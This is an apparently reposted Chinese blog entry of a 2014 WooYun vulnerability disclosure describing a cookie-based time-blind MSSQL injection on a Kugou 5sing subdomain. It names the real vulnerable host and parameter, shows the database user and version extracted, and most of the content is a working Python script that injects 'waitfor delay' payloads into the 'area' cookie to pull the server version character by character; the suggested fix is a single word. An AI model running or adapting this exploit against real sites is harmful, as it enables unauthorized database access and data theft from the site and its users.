记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

酷狗分站MSSQL盲注一枚(附Python验证脚本)

2014-12-18 19:36

注入点位于:

code 区域
GET http://huodong.5sing.kugou.com/



Cookie: area=asfasfas



参数area可注入。Cookie注入一枚。

漏洞证明:

猜解当前数据库用户system_user,前20个字符,得到:

code 区域
web5singdbman



猜解数据库版本前29个字符:

code 区域
SQL Server version is Microsoft SQL Server 2008 SP



kugou.png



脚本附上:

code 区域
import httplib

import time

import string

import sys

import random

import urllib



headers = {

'Cookie': '',

'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',

}



payloads = list(string.ascii_lowercase)

payloads += list(string.ascii_uppercase)

for i in range(0,10):

payloads.append(str(i))

payloads += ['@','_', '.', '-', '\\', ' ']



print 'Try to retrive SQL Server Version:'

user = ''

for i in range(1,30,1):

for payload in payloads:

timeout_count = 0

for j in range(1,3):

try:

conn = httplib.HTTPConnection('huodong.5sing.kugou.com', timeout=3)

random.seed()

area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- " % (i, ord(payload))

headers['Cookie'] = "area=" + urllib.quote(area)

start_time = time.time()

conn.request(method='GET',

url= '/Default.aspx',

headers = headers)

conn.getresponse()

conn.close()

print '.',

break

except:

timeout_count += 1

if timeout_count == 2: # 2 times to confirm

user += payload

print '[In Progress]', user

break



print '\n[Done], SQL Server version is', user

修复方案:

过滤


知识来源: www.wooyun.org/bugs/wooyun-2014-081844

阅读:85608 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“酷狗分站MSSQL盲注一枚(附Python验证脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云